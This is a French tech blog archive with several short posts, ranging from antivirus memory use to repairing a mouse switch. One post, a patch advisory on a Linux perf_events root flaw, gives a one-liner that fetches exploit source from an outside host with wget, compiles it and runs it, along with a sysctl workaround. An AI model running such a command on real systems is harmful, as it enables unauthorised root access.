Et oui, tout le monde n'a pas 32 go de mémoire vive sur sa machine ! L'installation d'un antivirus ou d'une suite de sécurité peut avoir des conséquences sur la rapidité de votre machine. Si le produit de sécurité consomme trop de mémoire vive votre machine peut commencer à utiliser le swap, et là c'est le début de la led témoin d'activité du HDD qui se transforme en led power (toujours allumée!).

Notre confrère Raymond.cc a passé au crible une vingtaine d'antivirus et les résultats sont très intéressants. Le prix du poids lourd est attribué à ZoneAlarm Free A/V+Firewall talonné par Sophos ESC. A l'inverse on trouve Webroot SecureAnywhere et Avast! qui s'avèrent très peu consommateurs RAM.

Aucun lien entre la consommation mémoire et l'efficacité d'un antivirus n'est bien sûr établi, qu'on se le dise.

Cela confirme l'intérêt que j'avais pour l'antivirus de Microsoft (MSE). Je trouve qu'il fait plutôt bien son job et reste assez discret contrairement à Avira ou Avast! qui demandent une réactivation une fois par an... certes il n'est pas aussi bon que d'autres mais tout dépend des risques que vous prenez, et donc de vos compétences et connaissances. Pour quelqu'un qui ne fait que de la bureautique et surf avec Mozilla Firefox, cela suffit (par expérience).

Et vous, votre antivirus est classé en quelle position ?

Article original écrit par Mr Xhark publié sur Blogmotion le 20/05/2013 | 5 commentaires |
Attention : l'intégralité de ce billet est protégée par la licence Creative Commons

• 2.6.37 et la à 3.8.8 (inclus)
• 2.6.32 et 3.8.8 uniquement pour RedHat/CentOS

si une valeur précise est activée dans les options de compilations du noyau : CONFIG_PERF_EVENTS.

Elle permet à un simple utilisateur de devenir root, sans mot de passe bien sûr (peut aussi faire crasher le système).

A la différence des failles généralement découvertes celle-ci est très simple à utiliser, voici comment s'en prémunir.

L'exploit

En cause : la mauvaise déclaration d'un pointeur rapidement corrigé sur le dépôt git de kernel.org.

Ayant fraîchement installé Debian 7, je n'ai pas tardé de me rendre compte que la faille fonctionne parfaitement comme le montre l'illustration du billet ci-dessus.

Pour utiliser l'exploit :

wget http://fucksheep.org/~sd/warez/semtex.c --quiet && gcc-4.6 -O2 semtex.c && ./a.out

Une fois la faille corrigée vous obtiendrez : a.out: semtex.c:51: sheep: Assertion `!close(fd)' failed.

Autant le dire : ne trainez pas à corriger cette faille !

Du côté des Debian cela a été corrigé dans Wheezy (stable) avec le déploiement du kernel 3.2.41-2+deb7u2, pour les autres distributions le lien est présent en haut de la page de correctif Debian. RHEL 4 et 5 ne seraient pas affecté d'après RedHat, contrairement à la version 6 et MRG 2 (source).

Si vous êtes chez OVH je vous invite à lire le topic associé puisque les kernels sont déjà dispo.

Si vous ne voulez pas patcher de suite, vous pouvez contourner le problème de la façon suivante :

1. Ajouter "kernel.perf_event_paranoid = 2" dans le fichier /etc/sysctl.conf
2. Exécuter la commande suivante en étant root (pour éviter le reboot) :  sysctl -p

A vos upgrade, et vite car déjà plus de 48h se sont écoulées avant l'arrivée du patch.

Attention : même si GCC n'est pas disponible dans un environnement (chrooté par exemple) rien n'empêche de compiler avec GCC sur un serveur ayant la même architecture puis de récupérer le binaire afin de l’exécuter. Là aussi c'est bête, mais ça fonctionne si votre serveur est faillible.

Article original écrit par Mr Xhark publié sur Blogmotion le 17/05/2013 | 3 commentaires |
Attention : l'intégralité de ce billet est protégée par la licence Creative Commons

Sauf que commander en chine, c'est jamais la joie. Entre le délai (10 à 20 jours en général) et le suivi plus que limite, ça passe l'envie. Pour mon cas le colis était expédié par la Hong Kong Post, mais le site de tracking est trop succin.

Du coup j'ai découvert un site de suivi de colis multi-transporteurs pour les colis venant de Chine, avec bien plus de détails sur le suivi que ce que m'a donné la HK Post pour mon cas : track-chinapost.com

Cliquer sur le bouton "Global Tracking" puis choisir le pays de destination (france par exemple). Entrez le numéro de colis et regardez où en est votre colis.

Pour info : dans mon cas il y a eu 11 jours  entre le statut "Arriving France" (arrivé sur le sol français) et "Under Processing" qui correspond à l'arrivée dans le centre de tri le plus proche de chez moi. Je ne sais pas si c'est le système de tracking qui prévoit des délais types et qui provoque ce genre de décalage, ou bien un contrôle par la douane (j'en avais pour 8 euros...)

track-chinapost.com/

Bref, j'ai commandé en chine.

ps : avec tous les ponts du mois de mai il faut dire que j'ai eu du mal à estimer les jours de voyage du colis ne sachant pas s'il était sur le sol français ou pas... Helran détaille les différents libellés concernant la HK Post pour ceux que ça intéressent.

Article original écrit par Mr Xhark publié sur Blogmotion le 14/05/2013 | 10 commentaires |
Attention : l'intégralité de ce billet est protégée par la licence Creative Commons

Les plugins et clients twitter sont tellement nombreux aujourd'hui qu'ils permettent tous le RT, alors que twitter.com ne propose que le retweet pur et simple. Si au premier abord la différence vous paraît minime, détrompez-vous.

Elle est importante pour ceux qui vous suivent ! Dans le cas du retweet ils verront le profil de la personne à l'origine du tweet (même s'ils ne la suivent pas), alors qu'avec un RT c'est votre profil qui apparaîtra comme auteur du tweet.

Sans parler du fait qu'un RT peut-être frauduleux (et la situation cocasse mais le faux est détectable), seul le retweet est véritable.

Pour répondre à cette question existentielle direction ce billet où tout y est expliqué.

Article original écrit par Mr Xhark publié sur Blogmotion le 13/05/2013 | Un commentaire |
Attention : l'intégralité de ce billet est protégée par la licence Creative Commons

Le genre d'astuce à connaître en entreprise si vous ne voulez pas devenir dingue dans des environnements multi-domaines sans relation d'approbation (sans trust).

C'est aussi le cas en entreprise lorsque vous accédez à une machine qui n'est pas dans le même domaine (Active Directory) que le votre, ou que la machine n'est membre d'aucun domaine (comptes locaux linux avec samba par exemple). Ce qui provoque le verrouillages de compte de domaine AD car une fois votre mot de passe changé, Windows lui a gardé l'ancien en mémoire. Et lorsque vous essayez d'accéder à une ressource en dehors de votre domaine (pas d'identification Kerberos) Windows envoi les identifiants qu'il a stocké.

Ce gestionnaire d'identification est présent dans Windows 2000, XP, Vista, 7 et 8. Il est très pratique d'utiliser ce gestionnaire pour éviter d'avoir à rentrer trop souvent son mot de passe, d'autant qu'il supporte les jokers comme *.blogmotion.local qui s'appliquera à toutes les machines du domaine AD blogmotion.local (comme dc1.blogmotion.local).

En pratique

Pour accéder à ce gestionnaire (coffre Windows) plusieurs méthodes :

1. Via le menu Démarrer (chercher ""gestionnaire d'idenfication") ou le Panneau de configuration
   
2. Démarrer > Exécuter > control userpasswords2 puis OK (onglet  > Gérer les mots de passe)
   
3. Démarrer > Exécuter >rundll32.exe keymgr.dll,KRShowKeyMgr (source)
   

Peu importe la façon que vous utilisez car pour Windows c'est transparent et géré dans la même base (chiffrée). Vous pouvez exporter vos mots de passe dans un fichier CRD via l'assistant Windows qui vous demandera un mot de passe pour protéger ensuite ce fichier. Pratique en entreprise si vous réinstallez ou remplacez le PC d'un utilisateur qui a oublié ses mots de passe...

Des stratégies de groupe (GPO) et des stratégies de sécurités locales peuvent bloquer l'accès à ce gestionnaire, mais c'est fortement déconseillé.

Article original écrit par Mr Xhark publié sur Blogmotion le 12/05/2013 | 2 commentaires |
Attention : l'intégralité de ce billet est protégée par la licence Creative Commons

Mais il est d'ores et déjà en ligne sur le site de Telerama.

Le documentaire parle d'un Internet, le vrai Internet. Pas celui des reportages à deux balles que l'on voit sur la TNT trop régulièrement où les amalgames sont nombreux et trop fréquents. Le reportage est axé sur les protagonistes d'Internet, ceux qui l'ont fondé et qui défendent l'idée d'un Internet libre.

Un excellent documentaire réalisé par Jean-Marc Manach (que apercevez chaque semaine dans le Vinvinteur sur France5), Julien Goetz et Sylvain Bergère. A voir, vraiment !

Article original écrit par Mr Xhark publié sur Blogmotion le 11/05/2013 | Aucun commentaire |
Attention : l'intégralité de ce billet est protégée par la licence Creative Commons

Au programme de nombreuses nouveautés et mises à jour des packages, mais aussi la prise en charge multi-architecture. A l'inverse du noarch il permet d'installer des paquets logiciels 32 bit (ou autre archi) sur une machine 64 bits par exemple. Fini les problèmes de dépendances !

Debian annonce que 70% de la souche logicielle a été modifiée. A savoir que :

• Debian prend en charge l'installation et l'amorçage sur UEFI pour les PC 64 bits récents (amd64), même s'il n'y a pas encore de prise en charge pour l'amorçage sécurisé (Secure Boot)..
• 9 architectures sont gérées : PC 32 bits/Intel IA-32 (i386), PC 64 bits/Intel EM64T/x86-64 (amd64), Motorola/IBM PowerPC (powerpc), Sun/Oracle SPARC (sparc), MIPS (mips (gros-boutiste) et mipsel (petit-boutiste)), Intel Itanium (ia64), IBM S/390 (s390 sur 31 bits et s390x sur 64 bits) et ARM EABI (armel pour du matériel plus ancien et armhf pour du matériel récent avec unité de calcul flottant).
• GNOME est fourni en v3.4
• Linux est fourni en v3.2
• Samba est fourni en v3.6.6

Penser à lire le guide d'installation avant de télécharger Debian 7.

Source

Article original écrit par Mr Xhark publié sur Blogmotion le 06/05/2013 | 2 commentaires |
Attention : l'intégralité de ce billet est protégée par la licence Creative Commons

Plutôt que de racheter une souris j'ai décidé de lutter contre cette obsolescence et de réparer ce qui était en cause puisqu'elle coûte seulement 20 centimes d'euros.

Les symptômes

J'étais très satisfait d'une souris Logitech VX Nano qui est malheureusement tombée en panne après plus de 3 ans d'utilisation. C'est le clic gauche qui a commencé à avoir des ratés lors du glissé déposé : le clic se perdait en cours de route. Sélection de texte, déplacement de fichier, retouche photoshop... nombreux sont les cas où le clic doit être maintenu. Je ne vous explique pas la dangerosité de la chose sur des déplacements de fichiers qui arrivaient n'importe où ! une belle crise de nerf en perspective. D'autres sur le web ont un problème de double-clic accidentel dont la cause est la même.

Je me suis dit que ma souris avait déjà tenu bon et étant satisfait du modèle, j'achète une deuxième souris identique. Au bout de 2 ans et demi : le symptôme du clic gauche qui se reproduit. Cette fois c'est sûr, je suis victime d'obsolescence programmée. Grâce à la garantie des 3 ans je parvient à me faire remplacer cette deuxième souris, j'en profite pour souligner l'excellent SAV Logitech.

Deux fois la même panne sur le même produit, ce n'est pas un défaut mais un vieillissement d'un des composants : le clic gauche. Certaines souris équipées du même composant valent plus de 100 euros et il serait dommage de la jeter alors que le composant défectueux coûte moins d'un euro non ?

La solution

En cherchant sur Internet je me suis rendu compte que ce dysfonctionnement n'était pas propre à mon modèle mais à de nombreuses souris (logitech, microsoft, etc).

Derrière le clic gauche se cache un microswitch (micro interrupteur) qui est fait pour fonctionner plusieurs centaines de milliers de fois. Une fois ce nombre dépassé... et bien il ne fonctionne plus comme il le devrait, d'où mes soucis de cliqué-glissé.

En démontant la souris je localise le microswitch de marque Omron et dont la référence est D2FC-F-7N. Difficile d'en savoir plus sur ce produit qui semble être obsolète.

J'ai découvert qu'il était possible d'ouvrir ce microswitch afin de tordre la lamelle (ou retirer l'oxydation) pour qu'elle fasse de nouveau contact correctement sur ce site. Néanmoins je dois vous préciser que c'est un travail d'horloger car la pièce est très petite et difficile à cliper. Afin de ne pas recommencer dans 7 jours, j'ai opté pour le remplacement du microswitch par un modèle équivalent plus robuste.

Un microswitch est composé de plusieurs caractéristiques : dimension, bouton ou lamelle, pattes et pression d'appui (75 grammes /0.74 newton dans notre cas). Un microswitch trop dur rendrait le clic inutilisable ou inconfortable. Je me suis donc plongé dans les spécifications et après avoir parcouru de nombreux forums, un des microswitch équivalents sur le marché est le Omron D2F-01F. Sa durée de vie annoncée de de 1 million de clics au rythme de 1 par seconde, mais si les clics sont plus espacés cela doit augmenter largement sa durée de vie. Le microswitch d'origine était lui prévu pour fonctionner 5 million de clics et ce indépendamment du rythme. En clair, la pression n'entrait pas dans la durée de vie du microswitch et c'est pour cette raison que le D2F-01F est meilleur. Il y a une force de fonctionnement (OF) et une force de libération (RF).

D'après mes recherches, voici un résumé des microswitchs en rapport avec le microswitch d'origine D2FC-F-7N :

• D2F-01F : modèle compatible ayant une bonne durée de vie, pas cher (2 euros les 10 sur eBay). C'est celui que j'ai choisi chez AAAA Electronic (sur eBay)
• D2FC-3M : modèle compatible. Serait plus solide encore que le D2F-01F mais quasi introuvable sur le web (modèle compatible)
• D2F-J01F : modèle compatible relativement cher.Remplaçant du microswitch original D2DC-F-7N
• D2F-01FL : ce modèle n'a pas la bonne force de pression (0,25 grammes au lieu de 0,75), ne l'achetez pas !

Matériel requis

Remplacer ce microswitch nécessite de savoir utilise un fer à souder et d'être méticuleux. Vous aurez besoin de :

1. Un fer à souder 30w minimum
2. De l'étain
3. Multimètre avec signal sonore pour la continuité
4. D'une autre personne car c'est plus pratique pour les manipulations (facultatif)
5. Pompe aspirante ou tresse à dessouder (facultatif)
6. Beaucoup de patience

Démontage de la souris

Le démontage de la souris est simple :

1. Retirer les piles et le récepteur s'ils sont présents
2. Retirer les 3 patins noirs en téflon sous la souris à l'aide d'un cuter
3. Dévisser les 3 vis à l'aide d'un tournevis crussiforme
4. Dévisser la vis au fond du réceptacle pour les piles : il y a deux vis, dévisser uniquement celle à l'extrémité qui est la plus proche bouton rouge d'éjection du nano récepteur (l'autre est au centre), cf photo ci-dessus
5. La souris s'ouvre un deux parties
6. Déconnecter l'alimentation des piles ainsi que la nappe blanche du laser (tirer la languette marron vers le haut délicatement pour la libérer)
7. Retirer les vis qui tiennent le PCB (carte électronique) ainsi que celles de la molette (attention à ne pas perdre la petite pièce en plastique noire qui va sortir). 6 vis au total (dont une plus longue que les autres)

Retirer délicatement le PCB, il coince car un ergot le maintient près du réceptacle de piles mais finira pas sortir. Et voilà le coupable :

Retirer le microswitch

C'est là ou ça se corse un peu, mais en suivant mes conseils vous allez vous en sortir. Avant de vous lancer, testez la continuité au multimètre pour être certain que vous êtes dans le même cas que moi (cf. dernière image du billet).

Pour dessouder le microswitch, deux méthodes possibles. La structure du composant fait qu'un fer inférieur à 30w ne suffira pas à faire fondre l’étain.

• Méthode 1 : vous arrivez à faire fondre l'étain présent et à le retirer (avec une pompe ou en tapant le PCB contre une table, la méthode à l'ancienne ). Si vous arrivez à retirer l'étain sur les 3 pattes du composants, alors c'est gagné. Sinon passez à la méthode 2.
• Méthode 2 : prenez une pince coupante afin de couper le microswitch et de rendre indépendant les 3 pattes pour supprimer le pont thermique. Coupez donc dans le plastique du microswitch (en rouge sur la photo), n'ayez pas peur ! Puis dessouder ensuite les 3 pattes une par une.

Le PCB ne doit pas être à l'envers afin que l'étain coule vers le bas avec la gravité, sinon l'étain passera de l'autre côté du PCB (côté du microswitch). Votre fer à souder devra souder par dessous, pas pratique mais indispensable.

Important : ne tirez sur le microswitch pour le retirer. S'il ne vient pas c'est qu'il reste de l'étain et vous risquez d'arracher les pistes miniatures autour de chaque patte. C'est ce qui m'est arrivé sur les deux pattes extérieures qui n'ont plus de bague dorée :

Voici à quoi ressemble le microswitch ouvert défectueux :

Souder le nouveau microswitch

Faites attention à le souder à l'endroit, vous ne pouvez pas vous tromper car l'interrupteur est dessiné sur le PCB.

Important : le microswitch doit être soudé sans espace sur le PCB, même minime. Il doit être plaqué au maximum et je vous conseille d'utiliser un support sur lequel vous appuierez l'interrupteur au moment de le soudez. Ne soudez pas la deuxième patte tant que le PCB n'est pas collé car il vous sera impossible ensuite de chauffer les deux pattes. Si le microswitch ne plaque pas le clic restera enfoncé en permanence au remontage de la souris, prenez exemple sur le clic droit pour comprendre.

Malgré les pastilles arrachées je suis arrivé à souder le microswitch grâce au test de continuité du multimètre donc voici la correspondance :

Attention : le point TP4 bipera au multimètre que si les deux pattes extérieures sont soudées. Inutile de vous acharner si vous ne soudez que la première et que ça ne sonne pas.

Pour finir

Il vous suffit de remonter votre souris une fois que tout fonctionne bien. Si le clic est trop sensible ou reste enfoncé c'est que le microswitch n'est pas soudé assez près du PCB.

En espérant que ce guide permettra à de nombreuses souris de retrouver une seconde vie, voir plus !

Quelques docs et liens en vracs : specifications (Omron canada), specifications (mouser france), technique pour scotcher un microswitch démonté (inutile si vous le changez), gamme D2F (Omron)

Article original écrit par Mr Xhark publié sur Blogmotion le 05/05/2013 | 6 commentaires |
Attention : l'intégralité de ce billet est protégée par la licence Creative Commons

Inutile de passer par un lecteur CD Virtuel, ImgBurn, Nero ou que sais-je. Précisez le fichier NRG source et en quelques secondes vous obtiendrez le même fichier au format ISO. VirtualBox par exemple est incapable d'utiliser un fichier NRG comme image virtuelle bootable, tout comme 7zip qui ne parvient pas à explorer un fichier NRG alors qu'avec un ISO ça fonctionne.

Pas d'installation, seulement 330 ko que je vous conseiller de garder parmi vos outils sur une clé ou disque USB. Le site web est aussi dépouillé que l'outil, une bonne chose.

NRGtoISO

Article original écrit par Mr Xhark publié sur Blogmotion le 04/05/2013 | 2 commentaires |
Attention : l'intégralité de ce billet est protégée par la licence Creative Commons

Il est ensuite possible de partager vos annotations grâce à l'URL unique qui est générée. Votre correspondant verra vos annotations facilement et rapidement puisqu'elles sont mises en valeur avec un encadrement sur la page.

Pratique si vous voulez transmettre vos suggestions sur le design ou le contenu d'un site web. Plutôt que de se casser la tête à expliquer de quelle zone on parle via mail, utilisez BounceApp !

Voici un exemple sur Blogmotion  : http://bounceapp.com/95582

BounceApp

Merci @pyrou pour la découverte de cet outil

Article original écrit par Mr Xhark publié sur Blogmotion le 03/05/2013 | Un commentaire |
Attention : l'intégralité de ce billet est protégée par la licence Creative Commons